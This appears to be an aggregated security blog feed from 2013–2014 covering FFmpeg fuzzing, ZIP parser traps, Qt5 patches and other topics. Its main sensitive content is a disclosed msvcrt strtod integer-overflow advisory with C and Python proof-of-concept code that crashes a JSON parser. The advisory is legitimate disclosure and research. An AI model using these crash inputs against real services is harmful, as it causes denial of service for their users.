By Gynvael Coldwind | Mon, 17 Feb 2014 00:08:47 +0100 | @domain:
As some of you may know, I've published a little over a hundred podcasts in my native language and it seems I finally got around to try and record something in English. The podcast is about one of the solutions (and a lazy one at that) to the "HackMe" Binathlon 400 task (it was basically a ZX Spectrum crackme) from the Olympic CTF Sochi 2014 run by the MSLC.

I hope you'll enjoy the video. Feel free to ask any questions (ideally in the YouTube comments) with regards to the task that you have.

If you like the idea of me recording podcasts on security, reverse-engineer and programming related topic, let me know - I might make a habit out of it.

Node.js gamepad driver

By xa | Sat, 01 Feb 2014 22:25:00 GMT | @domain:

Node.js gamepad in action

Some time ago I wanted to play an old-school game and I wanted to use my gamepad, and of course I could not find it. The solution? Create my own gamepad, but with limited hardware related skills that would be a little bit difficult. The next best thing - to use an touch capable device. But it turned out quite quickly that it would not be so easy. It’s not a problem when the HTML5 gamepad controls an HTML5 game on the same server/browser, but what about native games? A driver would be needed for that and my level of expertise in that area was the same as the level in hardware bulding mumbo-jumbo. My experimental “driver” had two main goals: to run on ubuntu and be build in node.js

The following Post is not a tutorial, so I’m not covering the subject from top to bottom, but I’m providing, a great starting point. This should give you some idea how things work and what to expect from such a device. At the end I’m linking to a Node.js application which acts like a device driver. This app is not in any way a production ready solution, but only an experiment, so keep in mind that there are many bugs, and that there is a high posibility that it will not run on your system (I’ve created it and tested only on Ubuntu 13.10)

Fun with antigravity

By xa | Tue, 28 Jan 2014 22:00:00 GMT | @domain:

Some time ago, I needed a simple crowd algorithm for a project of mine. In that project there was a bunch of entities, which were moving towards a common target. Everything was alright until those entities were close to the target and each other - every entity was placed at the target at the same point. I've tried to implement some collision detection for every entity, so if one entity detected that it is colliding with another one, it would stop moving and wait for the second entity to go away. But, when there would be multiple entities in close proximity - then almost everyone would wait for everyone.

The solution for a simple, almost dumb crowd simulation was very close. Every enitity, instead of stoping and waiting, should apply a revese force which would depend on the proximity to a near entity. That approach is the opposite effect to gravity - antigravity.

The result of this algorithm can be seen above, with some presets for particle behaviors from a "crowd", "jelly" to "bacteria". Such a simple solution can create a great range of posibilities. Of course this is not near a full blown crowd simulation with advanced agent AI, but for my small project, the antigravity did a great job.

Appmenu Qt5: patches and the release candidate

By sil2100 | Tue, 14 Jan 2014 16:29:00 GMT | @domain:
Happy new year! I hope this post to be the last one in the series of 'Appmenu for Qt5'. Holidays have passed and now all my required patches have been successfully merged to upstream Qt repositiories. This means that according to our current policy, we can now cherry-pick those patches to the Qt5 versions that are used in Ubuntu. Therefore, the still-prepared Ubuntu Qt 5.2 packages are already shipping my changes as quilt patches, enabling proper appmenu-qt5 support. All is ready for testing.

FFmpeg and a thousand fixes

By j00ru | Fri, 10 Jan 2014 16:44:13 +0000 | @domain:
(Collaborative post by Mateusz “j00ru” Jurczyk and Gynvael Coldwind; a short version is available at the Google Online Security blog). Following more than two years of work, the day has finally came – the FFmpeg project has incorporated more than a thousand fixes to bugs (including some security issues) we have discovered in the project […]

FFmpeg and a thousand fixes

By Gynvael Coldwind | Fri, 10 Jan 2014 00:08:44 +0100 | @domain:
(Collaborative post by Mateusz “j00ru” Jurczyk and Gynvael Coldwind; a short version is available at the Google Online Security blog).
Following more than two years of work, the day has finally came - the FFmpeg project has incorporated more than a thousand fixes to bugs (including some security issues) we have discovered in the project thus far:

$ git log | grep Jurczyk | grep -c Coldwind

As this event clearly marks an important day in our ongoing fuzzing effort, we decided to provide you with some background on one of the activities we are currently working on.

FFmpeg repository logs with a logs of Found-by: j00ru and Gynvael

At Google, security is a top priority -- not only for our own products, but across the entire Internet. That’s why members of the Google Security Team and other Googlers frequently perform audits of software and report the resulting findings to the respective vendors or maintainers, as shown in the official “Vulnerabilities - Application Security” list. We also try to employ the extensive computing power of our data centers in order to solve some of the security challenges by performing large-scale automated testing, commonly known as fuzzing.

Back in December 2011 we were really inspired by Tobias Klein, his "Bug Hunter's Diary" book and specifically the "NULL POINTER FTW" section discussing the discovery and exploitation process of a write-what-where condition vulnerability identified by the author in one of the FFmpeg demuxers responsible for parsing 4X Media ("4xm" in short), with its source code residing in the "libavformat/4xm.c" source file. The security flaw was not difficult to find through manual analysis, since the affected code was contained within several continuous lines of text; while it was just a single example of a trivial programming error, it got us thinking. After all, if there was a simple vulnerability in a C module of less than 400 lines of code performing a relatively simple task, chances were there could have been more similar or less obvious problems in the entire FFmpeg codebase, currently at about 832,000 lines of code (and definitely with more than 0.5MLOC back at the time).

While reading about the 4xm demuxer vulnerability, we thought that we could help FFmpeg eliminate many potential low-hanging problems from the code by making use of the Google fleet and fuzzing infrastructure we already had in place. There were also several other reasons why we decided that taking the project as a fuzzing target would be a good idea:
  • FFmpeg had a history of reliability and security issues prior to Tobias' discovery, see FFmpeg Security website.
  • Feeding input to the software and triggering relevant code paths was as trivial as using the standalone ffmpeg executable with appropriate command line options.
  • The project was strictly about parsing complex, often proprietary file format structures in native C code - essentially, a paradise for any bug hunter. There were lots of dynamic allocations, arithmetic operations, indexing buffers based on input data, moving memory around and other operations known to be frequently prone to various types of programming mistakes. As a bonus, different parsing modules were developed by different contributors, typically with varying security awareness.
  • Input data was readily available - the internet was full of audio/video files in a variety of formats and encoded with different codecs. There were also dedicated corpuses of files designed to be used for media decoder testing. Two examples of such data sets are and the FFmpeg FATE project.
  • Roughly at the same time the Google-developed AddressSanitizer run-time memory error detector was gaining recognition. The utility offered instant and accurate detection of common classes of memory-related problems such as out-of-bounds read and write access to {stack, heap, static} arrays, use-after-free, invalid free, double free and more, at the cost of a 2-3x average slow down and some insignificant memory overhead. The utility seemed to be a perfect candidate for improving the detection rate of fuzzing-incurred errors which would otherwise not be detected at all or would manifest themselves in areas of code completely unrelated to the root cause location.
  • As a bonus, the ASan team decided to make it compatible with FFmpeg at early stages of the development and later ran the ASan-instrumented FFmpeg over a set of valid input files (not malformed or mutated in any way). Only by doing this, they were able to identify four bugs (see "Found Bugs"), providing us with more evidence that the codebase might require further investigation in search of programming errors in dealing with incorrectly formatted input bitstreams.
All of the above arguments discuss how the nature of FFmpeg made it suitable for automated testing, but there is also the matter of whether finding and having bugs fixed in the product is worthwhile, or precisely, who would benefit from the improved security posture of the project. FFmpeg and its derivatives (such as the spin-off Libav project) are the foundation of many other media-processing programs used both by desktop PC users and companies alike. For a fairly comprehensive list of products built upon, relying on or using parts of FFmpeg, see; notable examples include Google Chrome, MPlayer, VLC and xine. As a result, it was expected that any discovered and fixed bug would make millions of users directly or indirectly more secure, being enough of a justification to proceed and take the effort from idea to realization.

Before any fuzzing actually takes place, it is usually crucial for the success of the operation to gather a set of files with extensive code coverage, so that more (potentially unexpected) program states can be triggered during the fuzzing itself, spinned off the original coverage. We approached the problem by collecting around 7,000 sample media files from the aforementioned website and the FFmpeg FATE regression test suite, later adding more exotic files from the public web in order to further improve the subset of formats and codecs covered by the corpus. Once we were finally happy with the total number of basic blocks touched while processing the test cases (being a good measure of the total code coverage achieved), we made use of some 2,000 cores and relatively simple algorithms (such as bitflipping, swapping bytes, truncating the files and so forth) to mutate the input data, feed it to FFmpeg and save information about any resulting crashes.

The first fuzzing iteration ran for approximately one week and was able to uncover around 130 unique problems in the code, ranging from simple assertion failures to stack-based buffer overflows and other severe conditions:
  • NULL pointer dereferences,
  • Invalid pointer arithmetic leading to SIGSEGV due to unmapped memory access,
  • Out-of-bounds reads and writes to stack, heap and static-based arrays,
  • Invalid free() calls,
  • Double free() calls over the same pointer,
  • Division errors,
  • Assertion failures,
  • Use of uninitialized memory.
Our personal feeling is that between 10% and 20% of the problems could be considered easily exploitable security issues; however, the estimation has not been formally confirmed in any way.

We subsequently contacted the project maintainer - Michael Niedermayer - who submitted the first fix on the 24th of January, 2012 (see commit c77be3a35a0160d6af88056b0899f120f2eef38e). Since then, we have carried out several dozen fuzzing iterations (each typically resulting in less crashes than the previous ones) over the last two years using similar resources, occasionally improving our original corpus and tweaking the mutation configuration (e.g. fiddling with mutation ratios or getting them to match the internal structure of the tested files). Ever since we started the effort, we have been working closely with Michael, who has been extremely keen to work with us and fix all issues we would send his way. The numbers speak for themselves - out of over thousand commits submitted to FFmpeg as fixes to our findings, at least 750 were authored by Michael, which gives an outstanding average of one commit each single day for the last 23 months! We would like to thank him for all the work he has done and continues to do to improve the stability and security of the product; finding the bugs is just the start of a success.

The other ~350 commits in FFmpeg were mostly submitted by Libav project developers: Ronald S. Bultje, Luca Barbato, Alex Converse, Martin Storsjö and Anton Khirnov. We have been concurrently reporting issues in Libav during the last several months and similarly to FFmpeg, the maintainers are doing a great job writing and submitting patches, which FFmpeg is also cherry-picking to their own git repository (large chunks of the two projects are shared, as Libav started as a fork of FFmpeg). While the former project is doing their best to catch up with the latter, the figures speak for themselves again: there are "only" 413 commits tagged "Jurczyk" or “Coldwind” in Libav, so even though some of the FFmpeg bugs might not apply to Libav, there are still many unresolved issues there which are already fixed in FFmpeg. Consequently, we advise users to use the FFmpeg upstream code where possible, or the latest stable version (currently 2.1.1) otherwise. It is also a good idea to carefully consider which formats and codecs are necessary for your use case and disable all other parsers during compilation time, in order to reduce the attack surface to a minimum.

We are presently still improving our corpus and fuzzing methods and will continue to work with both FFmpeg and Libav to ensure the highest quality of the software as used by millions of users behind multiple media players. If interested in the effort, please keep an eye on the master branches for commits marked as "Found by Mateusz "j00ru" Jurczyk and Gynvael Coldwind" and watch out for new stable versions of the software packages. Hopefully, one day we will be able to declare both project "fuzz clean" against most publicly available samples and simple mutation algorithms. Until then, we recommend to refrain from using either of the two projects to process untrusted media files or alternatively to use privilege separation on your PC or production environment, where absolutely required.

Complete lists of developers who have ever submitted patches for bugs we identified in FFmpeg and Libav are shown below (sorted by the number of commits). They clearly illustrate that as of today, FFmpeg includes virtually all fixes developed for Libav, while Libav only has 50 out of a total of 750 Michael's commits (as previously mentioned, not all FFmpeg bugs affect Libav in the first place, though).

    750 Michael Niedermayer
108 Ronald S. Bultje
91 LucaBarbato
77 Martin Storsjö
48 Anton Khirnov
29 AlexConverse
5 Kostya Shishkov
4 Thilo Borgmann
1 VitorSessak
1 Reinhard Tartler
1 Paul B Mahol
1 MashiatSarker Shakkhar
1 Mans Rullgard
1 Justin Ruggles
1 Janne Grunau
1 Aurelien Jacobs
    107 Ronald S. Bultje
89 Luca Barbato
77 Martin Storsjö
50 Michael Niedermayer
48 Anton Khirnov
27 Alex Converse
5 Kostya Shishkov
2 Thilo Borgmann
1 Vitor Sessak
1 Reinhard Tartler
1 Paul B Mahol
1 Mashiat Sarker Shakkhar
1 Mans Rullgard
1 Justin Ruggles
1 Janne Grunau
1 Aurelien Jacobs
We would like to thank all of the above developers for their hard work on making both media libraries better with every single day.

English version of my ZIP-format slides

By Gynvael Coldwind | Wed, 04 Dec 2013 00:08:43 +0100 | @domain:
Ange reminded me that I never published the English version of the slides from my "Ten Thousand Traps: ZIP, RAR, etc" talk. I gave the talk in May this year, in Krakow, on a small Polish conference called SEConference. Apart from the slides there are also several "weird" ZIP examples, including a "schizophrenic" (as Ange calles them - and it's an accurate and easy to remember name), which seems to contain different files while viewing it under various ZIP parsers/libraries/unpackers (see slides 24 to 27 for results).

Download links:

the slides (2.8 Mb)
the weird zips (14 Kb)

I don't have this talk recorded in English, but you can see the demos in the recording of my Polish talk (in Polish) - see below.

• DEMO 1 at 2:00 - Unreal Commander exploit (ZIP unpack path traversal into DLL spoofing due to wrong directory privileges).
• DEMO 2 at 12:23 - viewed from Python, PHP and Java.
• DEMO 3 at 18:18 - File names in ZIP, exploit from DEMO 1 explained.
• DEMO 4 at 21:15 - Files with same name in ZIP.
• DEMO 5 at 26:10 - Memory content disclosure in Unreal Commander.

And that's it.

P.S. If you're into ZIP files, you might want to check out the Android "Master Key" bug (and other) - just google for it.

Windows msvcr*.dll 64-bit strtod endptr integer overflow

By Gynvael Coldwind | Sat, 23 Nov 2013 00:08:41 +0100 | @domain:
Some time ago I was reading a random Python JSON parsing library which was partly implemented in C. At one point I thought I spotted a bug in custom float number parsing - I've written a short PoC to trigger it and it worked (i.e. crashed Python), but behaved differently than I expected it to and seemed to work only on Windows. So I got back to looking at the code and in the end decided it was only my imagination - there was no bug. So… why did that PoC actually work? It turned out that in some cases the library fell back to using the good-old strtod for float parsing instead and yes, there was a bug - in the underlying msvcrt.dll strtod implementation.


  • The strtod/et al. (string-to-double) has a char **endptr output parameter, in which it stores the address of the next character after the parsed/converted-to-double number in the input buffer. This parameter is used by parsers to determine where to continue parsing after a number has been read.
  • Since internally strtod (or actually _fltin2 and _wfltin2 which are used deep inside) uses a 32-bit int type to store the number-of-parsed-characters, the final calculation of endptr (startptr + number-of-parsed-characters) may result in an address that is outside (in front) of the input text buffer on 64-bit systems.
  • This results in introducing DoS class, information leak class, or other types of bugs in parsers that rely on strtod and the endptr parameter.

Note: Both glibc and MinGW (statically linked) strtod implementation don't have this bug - it's msvcr*.dll specific.
Note 2: PoCs are at the bottom.

Root cause

Direct problem is in the _flt structure used by _fltin2 and _wfltin2 functions, which are used to do the actual string-to-double conversion in strtod/etc (see Affected versions and functions below). This structure looks as follows (Visual C++ CRT source code, file \crt\src\fltintrn.h):

typedef struct _flt
int flags;
int nbytes; /* number of characters read */
long lval;
double dval; /* the returned floating point number */
} *FLT;

This causes problems with overly long numbers on 64-bit platforms, since the nbytes might overflow (for numbers of length >= 2GB and < 4GB, etc), which leads to it having a negative or zero value.

This is problematic for strtod/et al., since they calculate the *endptr value in the following way (\crt\src\strtod.c):

struct _flt answerstruct;
FLT answer;
answer = _fltin2( &answerstruct, ptr, _loc_update.GetLocaleT());

if ( endptr != NULL )
*endptr = (char *) ptr + answer->nbytes;

A reasonably common way to use strtod in parsers (think: a JSON/XML/CSV/etc parser) is to do something like this:

if (looks_like_a_double(p)) {
char *ep;
val = strtod(p, &ep);
// errno checking / usage of val here
p = *ep;

This in fact leads to p pointing outside of the buffer (up to 2GB in front of the buffer) and the parsing continues there.


Since this is a low-level library function the impact depends on what is it used for. Here are a couple of examples (assuming that strtod is part of a parser that is passed untrusted input, e.g. a JSON or CSV file):
  • Infinite loop DoS - if the input string is 4 GB long, the result end pointer will be identical as the start pointer, so the parser will jump into an infinite loop (strtod doesn't report any errors of course, since the number is correctly parsed)
  • Crash DoS - setting end pointer so that it points to an unallocated memory (e.g. for a number of length 2GB the end pointer will be start pointer minus 2GB, which probably points to some unallocated memory or isn't even a canonical pointer)
  • Information disclosure - since you could redirect the "read pointer" of the parser to any buffer in memory that is on lower addresses than the start pointer, you could make it read arbitrary data from memory; if the read data would be later reflected back, you could fetch it back.
  • Other - there might be other, less probable (but still possible) examples; one would be a more complicated scenario where the parsed text (code) is verified beforehand, and then parsed and executed. In such case this bug could be used to redirect the parser to jump into e.g. a middle of the string/comment containing unsafe code (similar to jumping in the middle of an instruction in ROP, but on scripting language level). This would make an awesome CTF challenge, but I don't expect it to be found in real products.

Affected versions and functions

64-bit Windows only.

This has been confirmed on:
  • default, fully patched Windows 7 msvcrt.dll
  • msvcr90.dll, msvcr110.dll
  • newest Visual Studio 2013 redistributables msvcr120.dll
  • Windows 8.1 (preview) default msvcrt.dll
I guess we can extrapolate this to "all 64-bit versions".

Affected functions (generally: everything that directly or indirectly uses _flt.nbytes for anything meaningful):
  • _fltin2/_wfltin2 - these incorrectly calculate the _flt.nbytes
  • _strtod_l/_wcstod_l - these directly use _flt.nbytes
  • strtod/wcstod - these are just wrappers for the above functions
  • _Stodx/_Stod/_Stofx/_Stof - these use strtod
Worth looking for variants (e.g. __strgtold12_l/__strgtold12?).

Proof of concept

This proof of concept prints the correct and strtod returned end pointer.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(void) {

// SZ == INT_MAX + some more bytes
#define SZ 0x80000016

char *number = (char*)malloc(SZ);
memset(number, '1', SZ);
number[SZ-1] = 'm'; // Break syntax.
number[1] = '.'; // This is probably not needed.

char *end_good = number + SZ - 1;
char *end_strtod;

// strtod(number, &end_strtod); is OK too
// ... unless you use MinGW which uses it's own strtod,
// then it's better to just use _strtod_l for PoC.
_strtod_l(number, &end_strtod, NULL);

printf("number = %p\n", number);
printf("end_good = %p\n", end_good);
printf("end_strtod = %p\n", end_strtod);

// Example (faulty) results.
// number = 000000007FFF0040
// end_good = 00000000FFFF0055
// end_strtod = FFFFFFFFFFFF0055

return 0;

Real world example

A random JSON parser for Python with native code - ujson 1.33:

FASTCALL_ATTR JSOBJ FASTCALL_MSVC decodePreciseFloat(struct DecoderState *ds)
char *end;
double value;
errno = 0;

value = strtod(ds->start, &end);

if (errno == ERANGE)
return SetError(ds, -1, "Range error when decoding numeric as double");

ds->start = end;
return ds->dec->newDouble(ds->prv, value);

And a crash DoS PoC in Python (2.7 AMD64):

import ujson

n = "4." + "3"*0x7fffffff
x = ujson.loads(n, precise_float=True)

WinDBG says:

(2088.1fa4): Access violation - code c0000005 (first chance)
00000001`800050dc 8a0a mov cl,byte ptr [rdx] ds:00000001`00010061=??


I've reported the bug to Microsoft and the decision was to fix it in the future releases of Microsoft Visual C++ / Microsoft Windows. I think that's OK, especially taking into account that the possibility of severe vulnerabilities appearing as a result of this Microsoft C runtime library bug is minimal (that said, if you find one, let me know ;>).


Note: A lot of e-mails were flying back and forth, so I'm not going to list all dates.

2013-Aug-21: Send the report to Microsoft.
2013-Sep-17: Confirmation that the bugs works as described and are planned to be fixed.
2013-Oct-26: More information - the bug will be fixed in the next versions of msvcr*.dll.
2013-Nov-13: Microsoft receives the draft of this blog post from me for comments.
2013-Nov-23: Blogpost is public.

And that's it.

Appmenu Qt5: through a bumpy road, but working!

By sil2100 | Tue, 19 Nov 2013 21:19:00 GMT | @domain:
Some time ago I mentioned working on the global application menu for Qt5 - the so-called appmenu-qt5 for Ubuntu and its derivatives. After a longer while, I finally fount the time and occasion to resume my work - and, after a really bumpy ride, end up with a working solution. Some hacks had to be made, some Qt5 design decisions worked-around - but the end result is here: a working appmenu-qt5 QPA platformtheme plugin. In this post I would like to overview the implementation of the current proposed appmenu-qt5. Read on if you're interested in some of the Qt5 internals, workings of QPlatformTheme plugins and the confusing elements of the Qt Platform Abstraction in overall.

Windows System Call and CSR API tables updated

By j00ru | Sat, 16 Nov 2013 17:31:13 +0000 | @domain:
Having the first spare weekend in a really long time, I have decided it was high time to update some (all) of the tables related to Windows system calls and CSR API I once created and now try to maintain. This includes NT API syscalls for the 32-bit and 64-bit Intel platforms, win32k.sys syscalls for […]